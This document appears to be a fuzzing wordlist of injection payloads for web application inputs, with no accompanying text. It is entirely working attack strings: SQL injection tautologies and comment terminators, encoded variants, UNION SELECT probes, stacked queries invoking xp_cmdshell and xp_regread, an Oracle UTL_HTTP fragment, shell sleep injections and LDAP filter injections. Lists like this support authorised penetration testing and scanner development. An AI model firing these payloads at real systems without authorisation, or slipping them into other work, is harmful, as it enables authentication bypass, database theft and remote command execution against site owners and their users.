'
"
#
-
--
'%20--
--';
'%20;
=%20'
=%20;
=%20--
\x23
\x27
\x3D%20\x3B'
\x3D%20\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'OR%20select *
admin'--
<>"'%;)(&+
'%20OR%20''='
'%20OR%20'x'='x
"%20OR%20"x"="x
')%20OR%20('x'='x
0 OR 1=1
' OR 0=0 --
" OR 0=0 --
OR 0=0 --
' OR 0=0 #
" OR 0=0 #
OR 0=0 #
' OR 1=1--
" OR 1=1--
' OR '1'='1'--
"' OR 1 --'"
OR 1=1--
OR%201=1
OR%201=1 --
' OR 1=1 OR ''='
" OR 1=1 OR ""="
' OR a=a--
" OR "a"="a
') OR ('a'='a
") OR ("a"="a
hi" OR "a"="a
hi" OR 1=1 --
hi' OR 1=1 --
hi' OR 'a'='a
hi') OR ('a'='a
hi") OR ("a"="a
'hi' OR 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
OR
procedure
limit
ORder by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' OR username like '%
' OR uname like '%
' OR userid like '%
' OR uid like '%
' OR user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_passwORd
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' OR (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
'%20OR%201=1
%27%20OR%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' OR 1=1 OR ''='
' OR ''='
x' OR 1=1 OR 'x'='y
/
//
//*
*/*